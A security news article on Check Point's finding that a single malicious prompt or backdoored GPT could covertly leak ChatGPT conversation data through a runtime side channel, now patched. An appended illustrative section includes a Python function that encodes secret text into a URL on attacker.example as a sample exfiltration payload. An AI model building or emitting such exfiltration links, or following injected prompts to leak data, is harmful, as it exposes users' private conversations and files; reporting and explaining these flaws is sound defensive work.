OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
Mar 30, 2026
Vulnerability / Enterprise Security
A previously undisclosed vulnerability in OpenAI's ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."

Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that it was ever exploited maliciously.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypassed these safeguards entirely by exploiting a side channel originating from the Linux runtime ...
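To illustrate the general pattern Check Point describes — a malicious prompt instructing the model to smuggle conversation data into an attacker-observable channel — here is a minimal, hypothetical sketch. The attacker host, query parameter, and encoding scheme are all illustrative assumptions, not details from the report; the actual flaw relied on a Linux runtime side channel rather than a direct outbound URL, which is precisely what ChatGPT's guardrails are meant to block.

```python
import base64

def build_exfil_url(secret: str, attacker_host: str = "attacker.example") -> str:
    """Hypothetical exfiltration payload: pack stolen text into a URL.

    A prompt-injection payload might tell the model to emit a link like
    this so that rendering or fetching it leaks `secret` to the attacker.
    (attacker.example and the `d` parameter are illustrative only.)
    """
    # Base64url-encode so arbitrary text survives inside a query string;
    # strip '=' padding, which is not URL-safe without escaping.
    encoded = base64.urlsafe_b64encode(secret.encode()).decode().rstrip("=")
    return f"https://{attacker_host}/collect?d={encoded}"

if __name__ == "__main__":
    # Example: conversation content an injected prompt might target.
    print(build_exfil_url("user uploaded file contents"))
```

The point of the sketch is only the shape of the technique: any channel the runtime can reach (here, a URL; in the reported flaw, a Linux runtime side channel) can carry encoded conversation data out of the session.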